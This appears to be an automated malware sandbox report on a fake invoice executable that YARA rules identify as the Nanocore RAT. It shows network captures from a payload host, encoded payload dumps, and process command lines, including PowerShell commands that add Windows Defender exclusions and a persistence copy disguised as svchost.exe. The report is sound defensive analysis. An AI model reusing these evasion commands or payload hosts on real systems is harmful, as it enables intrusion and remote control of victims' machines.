                                                                                                              Data Ascii: 3274<p>ySyCsSybCSzbSyyQSybSTbSybySQTSNNSLsQSybbSyTNSsTSCzSTLSQsSbNSyCSsCSTySLKKSyTzSyLySLySzKSyLySyLSTSLCTSyNSNySLssSyNbSLCKSyNySTsSyCbSyzNSyCKSQKSyCTSyzCSzQSyKCSLsKSLbsSLySyCySQzSLyySsbSyyLSssSyQLSyKCSsQSyTySyQTSLKzSyNySbQSLCLSTCSLbKSLyLSyQLSzTSLLCSyTbSyKsSLyNSybsSbKSQCSyTNSysbSLKNSCQSTsSyLySybySQSLsCSQNSyLbSLbySNbSzCSLKsSTKSLSQNSzNSLyTSsQSbNSLyTSLKsSLybSLCLSKSbQSyCCSLKSLbSNLSyNNSLyLSNbSyzKSbsSTNSzLSyKTSzNSLKsSLQSyKbSyLKSyQQSyNySLsQSTQSyyLSyCbSLLCSbzSQ
                                                                                                              Feb 25, 2021 15:10:53.715553045 CET10317OUTGET /base/88756E9935B1A5EAEE811D9BDFD69574.html HTTP/1.1
                                                                                                              Host: coroloboxorozor.com
                                                                                                              Feb 25, 2021 15:10:53.783530951 CET10318INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 25 Feb 2021 14:10:53 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: keep-alive
                                                                                                              Set-Cookie: __cfduid=d4de44723b8acb5b852a68d7a1c6b68e81614262253; expires=Sat, 27-Mar-21 14:10:53 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
                                                                                                              Last-Modified: Wed, 24 Feb 2021 19:31:20 GMT
                                                                                                              Vary: Accept-Encoding
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                              cf-request-id: 087b2050b700000b47aeb3d000000001
                                                                                                              Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=RRpam08yb21ui9neTxb3iQ33jNbBtw8bAbyWjMcY4Lal4h4WZ5WnAzJt1lTGKu1juY69r0PXKBEB7JPYhumOSVGv3wffU6HNIo1lVmcrfHF92vAN"}],"max_age":604800}
                                                                                                              NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 6272032dff3e0b47-AMS
                                                                                                              alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                              Data Raw: 34 63 35 33 0d 0a 3c 70 3e 54 53 4e 4b 53 79 43 54 53 7a 79 53 79 43 54 53 7a 4e 53 79 43 54 53 4c 79 53 79 43 54 53 4c 4b 53 79 43 54 53 79 53 79 79 53 62 79 53 4b 53 62 4c 53 4b 53 62 62 53 4b 53 62 54 53 4b 53 62 73 53 4b 53 4b 53 4c 62 53 4e 51 53 79 51 54 53 79 4b 4e 53 79 51 54 53 79 4c 4c 53 79 51 54 53 79 4c 73 53 79 51 54 53 79 79 54 53 79 51 54 53 79 4b 4e 53 79 51 54 53 51 79 53 79 51 54 53 79 79 79 53 79 51 54 53 79 4c 79 53 79 51 54 53 79 4b 4e 53 79 51 54 53 79 4b 73 53 79 51 54 53 79 4b 7a 53 79 51 54 53 79 53 79 79 53 62 43 53 4b 53 73 4e 53 4b 53 73 51 53 4b 53 62 54 53 4b 53 62 79 53 4b 53 4b 53 79 51 53 4c 73 51 53 62 43 53 4c 73 7a 53 62 43 53 4c 62 4b 53 62 43 53 4c 73 4c 53 62 43 53 4c 73 62 53 62 43 53 79 4e 43 53 62 43 53 79 4e 79 53 62 43 53 79 4e 43 53 62 43 53 79 4e 79 53 62 43 53 79 53 79 79 53 73 51 53 4b 53 62 79 53 4b 53 62 62 53 4b 53 73 4e 53 4b 53 73 51 53 4b 53 4b 53 62 79 53 79 51 53 4c 79 53 73 51 53 4c 79 53 54 73 53 4c 79 53 4c 62 53 4c 79 53 73 62 53 4c 79 53 62 4e 53 4c 79 53 62 43 53 4c 79 53 62 4b 53 4c 79 53 73 51 53 4c 79 53 54 43 53 4c 79 53 54 73 53 4c 79 53 43 4b 53 4c 79 53 73 51 53 4c 79 53 54 43 53 4c 79 53 62 51 53 4c 79 53 54 62 53 4c 79 53 54 4c 53 4c 79 53 73 7a 53 4c 79 53 73 51 53 4c 79 53 43 79 53 4c 79 53 54 73 53 4c 79 53 54 4c 53 4c 79 53 73 51 53 4c 79 53 73 62 53 4c 79 53 62 7a 53 4c 79 53 79 53 51 53 62 43 53
                                                                                                              Data Ascii: 4c53<p>TSNKSyCTSzySyCTSzNSyCTSLySyCTSLKSyCTSySyySbySKSbLSKSbbSKSbTSKSbsSKSKSLbSNQSyQTSyKNSyQTSyLLSyQTSyLsSyQTSyyTSyQTSyKNSyQTSQySyQTSyyySyQTSyLySyQTSyKNSyQTSyKsSyQTSyKzSyQTSySyySbCSKSsNSKSsQSKSbTSKSbySKSKSyQSLsQSbCSLszSbCSLbKSbCSLsLSbCSLsbSbCSyNCSbCSyNySbCSyNCSbCSyNySbCSySyySsQSKSbySKSbbSKSsNSKSsQSKSKSbySyQSLySsQSLySTsSLySLbSLySsbSLySbNSLySbCSLySbKSLySsQSLySTCSLySTsSLySCKSLySsQSLySTCSLySbQSLySTbSLySTLSLySszSLySsQSLySCySLySTsSLySTLSLySsQSLySsbSLySbzSLySySQSbCS


                                                                                                              Code Manipulations

                                                                                                              Statistics

                                                                                                              CPU Usage

                                                                                                              Click to jump to process

                                                                                                              Memory Usage

                                                                                                              Click to jump to process

                                                                                                              High Level Behavior Distribution

                                                                                                              Click to dive into process behavior distribution

                                                                                                              Behavior

                                                                                                              Click to jump to process

                                                                                                              System Behavior

                                                                                                              Analysis Process: CN-Invoice-XXXXX9808-19011143287994.exe PID: 2016 Parent PID: 6012

                                                                                                              General

                                                                                                              Start time:15:09:56
                                                                                                              Start date:25/02/2021
                                                                                                              Path:C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe'
                                                                                                              Imagebase:0xbf0000
                                                                                                              File size:38008 bytes
                                                                                                              MD5 hash:A0F103F98EDE4DA72E178EE05DABE1E1
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                              Yara matches:
                                                                                                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.933305854.0000000004481000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000002.933305854.0000000004481000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: NanoCore, Description: unknown, Source: 00000000.00000002.933305854.0000000004481000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                              Reputation:low

                                                                                                              Chronological Activities

                                                                                                              Analysis Process: powershell.exe PID: 1472 Parent PID: 2016

                                                                                                              General

                                                                                                              Start time:15:10:08
                                                                                                              Start date:25/02/2021
                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force
                                                                                                              Imagebase:0xae0000
                                                                                                              File size:430592 bytes
                                                                                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                              Reputation:high

                                                                                                              Chronological Activities

                                                                                                              Analysis Process: conhost.exe PID: 1444 Parent PID: 1472

                                                                                                              General

                                                                                                              Start time:15:10:08
                                                                                                              Start date:25/02/2021
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff724c50000
                                                                                                              File size:625664 bytes
                                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high

                                                                                                              Chronological Activities

                                                                                                              Analysis Process: AdvancedRun.exe PID: 5008 Parent PID: 2016

                                                                                                              General

                                                                                                              Start time:15:10:09
                                                                                                              Start date:25/02/2021
                                                                                                              Path:C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:'C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                                                                                                              Imagebase:0x400000
                                                                                                              File size:91000 bytes
                                                                                                              MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Antivirus matches:
                                                                                                              • Detection: 3%, Metadefender, Browse
                                                                                                              • Detection: 0%, ReversingLabs
                                                                                                              Reputation:moderate

                                                                                                              Chronological Activities

                                                                                                              Analysis Process: AdvancedRun.exe PID: 4824 Parent PID: 5008

                                                                                                              General

                                                                                                              Start time:15:10:11
                                                                                                              Start date:25/02/2021
                                                                                                              Path:C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:'C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe' /SpecialRun 4101d8 5008
                                                                                                              Imagebase:0x400000
                                                                                                              File size:91000 bytes
                                                                                                              MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:moderate

                                                                                                              Chronological Activities

                                                                                                              Analysis Process: powershell.exe PID: 3400 Parent PID: 2016

                                                                                                              General

                                                                                                              Start time:15:10:18
                                                                                                              Start date:25/02/2021
                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe' -Force
                                                                                                              Imagebase:0xae0000
                                                                                                              File size:430592 bytes
                                                                                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                              Reputation:high

                                                                                                              Chronological Activities

                                                                                                              Analysis Process: conhost.exe PID: 4864 Parent PID: 3400

                                                                                                              General

                                                                                                              Start time:15:10:18
                                                                                                              Start date:25/02/2021
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff724c50000
                                                                                                              File size:625664 bytes
                                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high

                                                                                                              Chronological Activities

                                                                                                              Analysis Process: cmd.exe PID: 5856 Parent PID: 2016

                                                                                                              General

                                                                                                              Start time:15:10:19
                                                                                                              Start date:25/02/2021
                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:'C:\Windows\System32\cmd.exe' /c timeout 1
                                                                                                              Imagebase:0x11d0000
                                                                                                              File size:232960 bytes
                                                                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high

                                                                                                              Chronological Activities

                                                                                                              Analysis Process: conhost.exe PID: 616 Parent PID: 5856

                                                                                                              General

                                                                                                              Start time:15:10:19
                                                                                                              Start date:25/02/2021
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff724c50000
                                                                                                              File size:625664 bytes
                                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high

                                                                                                              Chronological Activities

                                                                                                              Analysis Process: timeout.exe PID: 816 Parent PID: 5856

                                                                                                              General

                                                                                                              Start time:15:10:19
                                                                                                              Start date:25/02/2021
                                                                                                              Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:timeout 1
                                                                                                              Imagebase:0x13a0000
                                                                                                              File size:26112 bytes
                                                                                                              MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high

                                                                                                              Chronological Activities

                                                                                                              Analysis Process: explorer.exe PID: 4792 Parent PID: 3424

                                                                                                              General

                                                                                                              Start time:15:10:21
                                                                                                              Start date:25/02/2021
                                                                                                              Path:C:\Windows\explorer.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:'C:\Windows\explorer.exe' 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe'
                                                                                                              Imagebase:0x7ff6fee60000
                                                                                                              File size:3933184 bytes
                                                                                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high

                                                                                                              Chronological Activities

                                                                                                              Analysis Process: explorer.exe PID: 4424 Parent PID: 800

                                                                                                              General

                                                                                                              Start time:15:10:22
                                                                                                              Start date:25/02/2021
                                                                                                              Path:C:\Windows\explorer.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                                                              Imagebase:0x7ff6fee60000
                                                                                                              File size:3933184 bytes
                                                                                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high

                                                                                                              Chronological Activities

                                                                                                              Analysis Process: svchost.exe PID: 4184 Parent PID: 4424

                                                                                                              General

                                                                                                              Start time:15:10:23
                                                                                                              Start date:25/02/2021
                                                                                                              Path:C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe'
                                                                                                              Imagebase:0xa80000
                                                                                                              File size:38008 bytes
                                                                                                              MD5 hash:A0F103F98EDE4DA72E178EE05DABE1E1
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                              Yara matches:
                                                                                                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.955915936.000000000458A000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000002.955915936.000000000458A000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: NanoCore, Description: unknown, Source: 0000000C.00000002.955915936.000000000458A000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                              Antivirus matches:
                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                              • Detection: 28%, ReversingLabs
                                                                                                              Reputation:low

                                                                                                              Chronological Activities

                                                                                                              Analysis Process: CasPol.exe PID: 4228 Parent PID: 2016

                                                                                                              General

                                                                                                              Start time:15:10:26
                                                                                                              Start date:25/02/2021
                                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
                                                                                                              Imagebase:0x4f0000
                                                                                                              File size:107624 bytes
                                                                                                              MD5 hash:F866FC1C2E928779C7119353C3091F0C
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000002.939634194.0000000002AF1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.913372093.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000002.913372093.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: NanoCore, Description: unknown, Source: 0000000D.00000002.913372093.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.951074840.00000000051C0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.951074840.00000000051C0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000002.951074840.00000000051C0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000002.945545205.0000000003B39000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: NanoCore, Description: unknown, Source: 0000000D.00000002.945545205.0000000003B39000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.949065366.0000000004EE0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.949065366.0000000004EE0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                              Reputation:moderate

                                                                                                              Chronological Activities

                                                                                                              Analysis Process: svchost.exe PID: 6176 Parent PID: 568

                                                                                                              General

                                                                                                              Start time:15:10:27
                                                                                                              Start date:25/02/2021
                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                              Imagebase:0x7ff6eb840000
                                                                                                              File size:51288 bytes
                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high

                                                                                                              Chronological Activities

                                                                                                              Analysis Process: WerFault.exe PID: 6216 Parent PID: 6176

                                                                                                              General

                                                                                                              Start time:15:10:28
                                                                                                              Start date:25/02/2021
                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2016 -ip 2016
                                                                                                              Imagebase:0x1b0000
                                                                                                              File size:434592 bytes
                                                                                                              MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high

                                                                                                              Chronological Activities

                                                                                                              Analysis Process: explorer.exe PID: 6224 Parent PID: 3424

                                                                                                              General

                                                                                                              Start time:15:10:29
                                                                                                              Start date:25/02/2021
                                                                                                              Path:C:\Windows\explorer.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:'C:\Windows\explorer.exe' 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe'
                                                                                                              Imagebase:0x7ff6fee60000
                                                                                                              File size:3933184 bytes
                                                                                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language

                                                                                                              Chronological Activities

                                                                                                              Analysis Process: WerFault.exe PID: 6252 Parent PID: 2016

                                                                                                              General

                                                                                                              Start time:15:10:30
                                                                                                              Start date:25/02/2021
                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2016 -s 2180
                                                                                                              Imagebase:0x1b0000
                                                                                                              File size:434592 bytes
                                                                                                              MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:.Net C# or VB.NET

                                                                                                              Chronological Activities

                                                                                                              Analysis Process: explorer.exe PID: 6292 Parent PID: 800

                                                                                                              General

                                                                                                              Start time:15:10:32
                                                                                                              Start date:25/02/2021
                                                                                                              Path:C:\Windows\explorer.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                                                              Imagebase:0x7ff6fee60000
                                                                                                              File size:3933184 bytes
                                                                                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language

                                                                                                              Chronological Activities

                                                                                                              Analysis Process: svchost.exe PID: 6408 Parent PID: 6292

                                                                                                              General

                                                                                                              Start time:15:10:34
                                                                                                              Start date:25/02/2021
                                                                                                              Path:C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe'
                                                                                                              Imagebase:0xa0000
                                                                                                              File size:38008 bytes
                                                                                                              MD5 hash:A0F103F98EDE4DA72E178EE05DABE1E1
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                              Yara matches:
                                                                                                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000013.00000002.972750680.0000000006A65000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000013.00000002.972750680.0000000006A65000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: NanoCore, Description: unknown, Source: 00000013.00000002.972750680.0000000006A65000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

                                                                                                              Chronological Activities

                                                                                                              Disassembly

                                                                                                              Code Analysis

                                                                                                              Reset < >

                                                                                                                Analysis Process: CN-Invoice-XXXXX9808-19011143287994.exe PID: 2016 Parent PID: 6012 CN-Invoice-XXXXX9808-19011143287994.exeCOMMON

                                                                                                                Executed Functions

                                                                                                                Function 08C40040, Relevance: 27.5, Strings: 6, Instructions: 20001COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.980704243.0000000008C40000.00000040.00000001.sdmp, Offset: 08C40000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: .fsri\wdi\C$E.fsri\wdi\C$\wdi\C$ri\wdi\C$sri\wdi\C$x.shv\xfsnha ati tinrtnceirrE
                                                                                                                • API String ID: 0-2761163555
                                                                                                                • Opcode ID: df9c69a44f8bebd82d32123c223c071702af95efa449d29c2a4c2d9a2d265410
                                                                                                                • Instruction ID: 9c4e81f48915fc7f711b792db1c46f63e6d28eb2b0e35ccdaec4b33915f22ccd
                                                                                                                • Opcode Fuzzy Hash: df9c69a44f8bebd82d32123c223c071702af95efa449d29c2a4c2d9a2d265410
                                                                                                                • Instruction Fuzzy Hash: 76B46570911214CFCB24CF04DA88A99B7F2AF01306F86D0DAD5295F622D776DACACF59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 08A20011, Relevance: 5.0, Strings: 2, Instructions: 2505COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.980498446.0000000008A20000.00000040.00000001.sdmp, Offset: 08A20000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: .st}{ mnlFX/$/"a.st}{ mnlFX/
                                                                                                                • API String ID: 0-928898513
                                                                                                                • Opcode ID: 5c2bcfe59a82655dfb009d06f8c4613c1b7fe44987977633c2dc75dee78d6c22
                                                                                                                • Instruction ID: 29f72b2af82f22804e09be1783f6f365d6e93a092a66ad6a7898419c777320c9
                                                                                                                • Opcode Fuzzy Hash: 5c2bcfe59a82655dfb009d06f8c4613c1b7fe44987977633c2dc75dee78d6c22
                                                                                                                • Instruction Fuzzy Hash: D8235F98A21260C8DB358F088198F6D66A3AF5634DF15919FC0541FF36E7F9C298C78B
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 08A20040, Relevance: 5.0, Strings: 2, Instructions: 2504COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.980498446.0000000008A20000.00000040.00000001.sdmp, Offset: 08A20000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: .st}{ mnlFX/$/"a.st}{ mnlFX/
                                                                                                                • API String ID: 0-928898513
                                                                                                                • Opcode ID: f2990c85d6c24ecc3c9f01c0af36b0cb6ed062ba5d81b89f42dd8aeb36364563
                                                                                                                • Instruction ID: a24d8e0f99f2c628b8f690afad1967e96a0dfc165da8d2a567dae2295316504e
                                                                                                                • Opcode Fuzzy Hash: f2990c85d6c24ecc3c9f01c0af36b0cb6ed062ba5d81b89f42dd8aeb36364563
                                                                                                                • Instruction Fuzzy Hash: A8235F98A21260C8DB358F088198F6D66A3AF5634DF15919FC0541FF36E7F9C298C78B
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 08A269B0, Relevance: 1.6, APIs: 1, Instructions: 53nativethreadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • NtSetInformationThread.NTDLL(?,00000011,?,?,?,?,?,?,?,08A2706F,00000000,00000000), ref: 08A271C0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.980498446.0000000008A20000.00000040.00000001.sdmp, Offset: 08A20000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: InformationThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 4046476035-0
                                                                                                                • Opcode ID: 66f9531f5cee66ee503dc59d37d7b7d3d96db9f57f67414191b04a9b627f9e31
                                                                                                                • Instruction ID: cfbfb51b13e75556c27d68d24babcb3990fd1c7f4e803b5c2f463658cdb10593
                                                                                                                • Opcode Fuzzy Hash: 66f9531f5cee66ee503dc59d37d7b7d3d96db9f57f67414191b04a9b627f9e31
                                                                                                                • Instruction Fuzzy Hash: 5411F3B59006189FCB20DF9AC884BDEBBF4FB48324F108419E559A7710D775A944CFA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 08A27152, Relevance: 1.6, APIs: 1, Instructions: 50nativethreadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • NtSetInformationThread.NTDLL(?,00000011,?,?,?,?,?,?,?,08A2706F,00000000,00000000), ref: 08A271C0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.980498446.0000000008A20000.00000040.00000001.sdmp, Offset: 08A20000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: InformationThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 4046476035-0
                                                                                                                • Opcode ID: 12748231a75274bb70a8dffe0149bb82ddcdfacfa963f214f56b9bbe1431c124
                                                                                                                • Instruction ID: c3acff884b027911367912a5cbbd2876dc501ea09e0282a5f48b52d1a73843b3
                                                                                                                • Opcode Fuzzy Hash: 12748231a75274bb70a8dffe0149bb82ddcdfacfa963f214f56b9bbe1431c124
